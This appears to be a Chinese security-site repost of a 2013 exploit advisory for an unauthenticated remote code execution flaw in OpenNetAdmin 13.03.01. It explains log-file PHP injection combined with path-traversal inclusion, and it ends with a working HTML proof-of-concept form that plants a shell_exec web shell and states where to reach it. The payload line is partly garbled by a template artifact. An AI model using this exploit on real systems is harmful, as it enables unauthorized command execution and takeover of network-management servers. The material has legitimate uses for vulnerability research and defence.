首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OpenNetAdmin 13.03.01 Remote Code Execution
来源:vfocus.net 作者:Mandat0ry 发布时间:2013-07-09  
# Exploit Title: OpenNetAdmin Remote Code Execution
# Date: 03/04/13
# Exploit Author: Mandat0ry (aka Matthew Bryant)
# Vendor Homepage: http://opennetadmin.com/
# Software Link: http://opennetadmin.com/download.html
# Version: 13.03.01
# Tested on: Ubuntu
# CVE : No CVE exists - 0day exploit - probably works on the demo on
their site as well! So they should be alerted.
 
OpeNetAdmin Remote Code Execution Exploit by Mandat0ry (aka Matthew Bryant)
 
Info:
This exploit works because adding modules can be done without any sort
of authentication.
 
Modules are in this form:
module[name] = The name of the function that will be run out of the
included file
module[description] = Irrelevant description of the module (unless
some PHP code is injected here hmm?)
module[file] = The file to be included and then the function
module[name] will be run from this included file
 
This exploit works by injecting some PHP code into the
/var/log/ona.log file via the module description parameter.
Everytime a module is added to OpenNetAdmin the description/name/etc
are all logged into this log file.
 
So...
 
By simply setting the module filepath to
"../../../../../../../../../../../var/log/ona.log" (add or remove dots
at will) we can include the log file as a module. Where it gets clever
is remember the description is logged! So we can add PHP code into the
description and thus the logs and it will be executed on inclusion of
this file! The PHP interpreter will ignore everything not enclosed in
PHP tags so it will only run the code we inject. This is basically a
spin off of Apache log injection exploitation. Once the module has been added all you have
to do is run it via "dcm.php?module=". This all works without any
guest account etc.
 
NOTE: Because of the way the logger script works we cannot use any "="
in our injected code as it will be escaped before being added to the
logs ("\=") so avoid using it!
 
Cool software but the code has a lot to be desired, I imagine their
are a LOT more exploits than what I found but once I had RCE I was
satisfied.
 
Proof of concept code for easy exploitation. Run this and then go to
http://URLHERE/ona/dcm.php?module=mandat0ry for your shell!
 
<center>
<head>
<title>0wned Your Network</title>
<script type="text/javascript">
function changeaction()
{
    document.sploit.action = document.getElementById("url").value;
    alert('Remember, your shell must be accessed via
'+document.getElementById("url").value+'?module=mandat0ry');
}
</script>
</head>
<font size="5">OpenNetAdmin RCE Exploit</font><br />
<font size="2"><i>Now with leet button sploiting action! (oooh,
ahhh!)</i></font><br /><br />
<form action="/" method="post" name="sploit" onsubmit="changeaction()" >
URL: <input id="url" value="http://127.0.0.1/ona/dcm.php" size="50" /><br />
PHP Code to Execute: <input type="text" size="50" name="options[desc]"
value="<?php echo shell_exec(
___FCKpd___0
GET[1]) ?>"/> <br /> <input type="hidden" name="module" value="add_module" /> <input type="hidden" name="options[name]" value="mandat0ry" /> <input type="hidden" name="options[file]" value="../../../../../../../../../../../var/log/ona.log" /> <input type="submit" value="Exploit!" /> </form> <b><i>Special thanks to: offsec, twitches, funkenstein, zachzor, av1dmage, drc, arsinh, and the coders for OpenNetAdmin!</i></b> </center>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Reader X 10.1.4.38 - BMP
·AOL Instant Messenger 8.0.1.5
·InstantCMS 1.6 Remote PHP Code
·Google Chrome 25.0.1364.152 HT
·Opera 12.15 Denial Of Service
·Solaris Recommended Patch Clus
·Nokia 1280 Denial Of Service
·ERS Viewer 2013 ERS File Handl
·Realtek Sound Manager AvRack (
·SikaBoom Remote Buffer overflo
·ABBS Audio Media Player .LST B
·Apache CXF prior to 2.5.10, 2.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved